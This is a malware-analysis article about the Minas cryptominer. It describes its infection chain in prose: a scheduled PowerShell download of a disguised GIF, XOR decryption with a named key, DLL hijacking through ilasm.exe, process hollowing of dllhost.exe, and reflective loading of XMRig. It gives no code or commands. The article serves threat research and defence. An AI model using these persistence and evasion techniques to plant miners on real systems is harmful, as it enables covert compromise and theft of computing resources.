Unveiling the Intricate Infection Chain of the Minas Malware

Introduction:

In the realm of cybersecurity, unexpected discoveries can shed light on intricate attack vectors. In this article, we delve into the case of Minas, a malicious miner that utilizes a complex infection chain to infiltrate systems and execute its mining operations. By reconstructing the attack, we gain valuable insights into the stealthy techniques employed by attackers and highlight the importance of robust security measures beyond traditional signature-based detection.

Unraveling the Infection Chain:

The Minas infection chain begins with a PowerShell script executed via the Task Scheduler, which downloads a file named lgntoerr.gif from a remote server. This seemingly harmless file is actually a decoy, concealing a .NET DLL encrypted within its contents. The PowerShell script decrypts the gif file, revealing the .NET DLL.

Upon loading the .NET DLL, two additional DLLs and an encrypted payload are extracted and decrypted. These files are then placed in the ProgramData directory. As a persistence mechanism, the .NET DLL creates a task via Task Scheduler to execute the legitimate ilasm.exe component during system startup.

At system startup, ilasm.exe is invoked and launches the malicious fusion.dll, which resides in the same directory. This DLL hijacking technique enables the loader to execute the second decrypted DLL. The second DLL, in turn, creates a suspended dllhost.exe process, decrypts the payload from an encrypted binary file, and loads it into the dllhost.exe process as a DLL.

The decrypted payload takes control of the dllhost.exe process and initiates the execution of the miner DLL in memory. This sequence of steps ensures that the malicious miner operates covertly on the infected system.

Technical Details:

The PowerShell script serves as the initial launcher of the Minas malware installation process. It downloads an encrypted payload from a remote server and decrypts it using a custom XOR encryption algorithm with the key "fuckkasd9akey." The payload, a .NET binary (DLL), is then loaded into memory for execution.

To maintain persistence, the malware verifies the presence of the legitimate ilasm.exe file on the system. Upon confirming its existence, the malware creates a Scheduled Task associated with ilasm.exe, guaranteeing execution at system startup. Additionally, the installer appends a portion of itself to a file derived from the machine name, encrypting the resulting file using the machine name as the key.

The installer triggers the execution of ilasm.exe, which, in turn, loads the malicious fusion.dll. This DLL hijacker performs several tasks, including hiding the console of the ilasm.exe process and terminating the process if its name does not match. It also attempts to load another DLL, {SDBMHash(MachineName)}.dll, based on the SDBM hash function.

{SDBMHash(MachineName)}.dll further checks the ilasm.exe process and retrieves a PID value from a file. Multiplying this PID by 0x1F4, it attempts to terminate the corresponding dllhost.exe process. Subsequently, {SDBMHash(MachineName)}.dll decrypts the main payload (miner) using the machine name as the decryption key.

Following decryption,

{SDBMHash(MachineName)}.dll creates a suspended dllhost.exe process, maps the payload into its memory, and modifies the entry point of the main thread. It writes the PID of the created dllhost.exe process to a file and resumes the process, terminating ilasm.exe.

The dllhost.exe process then transfers control to the decrypted raw loader, which maps the XMRig miner (a DLL file) into the process memory and initiates it using reflective loading. The miner employs the values from the process environment variable configuration for cryptocurrency mining operations.

Conclusion

The discovery and analysis of the Minas malware infection chain highlight the sophistication and persistence of modern-day cyber threats. Minas employs a complex series of steps, including PowerShell scripts, DLL hijacking, encryption, and process injection, to establish a stealthy presence on infected systems. This multi-layered approach, coupled with the use of obfuscation techniques, allows Minas to evade traditional signature-based detection methods.

The Minas malware serves as a reminder of the evolving landscape of cyber attacks and the need for proactive security measures. Relying solely on antivirus solutions with signature-based detection may prove insufficient in detecting such advanced threats. Instead, adopting security solutions that focus on behavior analysis and anomaly detection can enhance the ability to identify and mitigate such attacks.

Furthermore, the discovery of Minas raises concerns about the compromise of network infrastructure, potentially indicating the presence of determined and resourceful attackers. Organizations should strengthen their security posture by implementing robust access controls, regular vulnerability assessments, network segmentation, and employee education on cybersecurity best practices.

As the Minas malware continues to evolve, it is crucial for security professionals to remain vigilant and stay abreast of emerging threats. Ongoing research, collaboration, and information sharing within the cybersecurity community are key to effectively combating such sophisticated malware strains and safeguarding critical systems and data.

Ultimately, by understanding the intricate infection chain of malware like Minas, organizations can fortify their defenses and take proactive steps to protect their networks, systems, and valuable assets from increasingly complex and evasive cyber threats.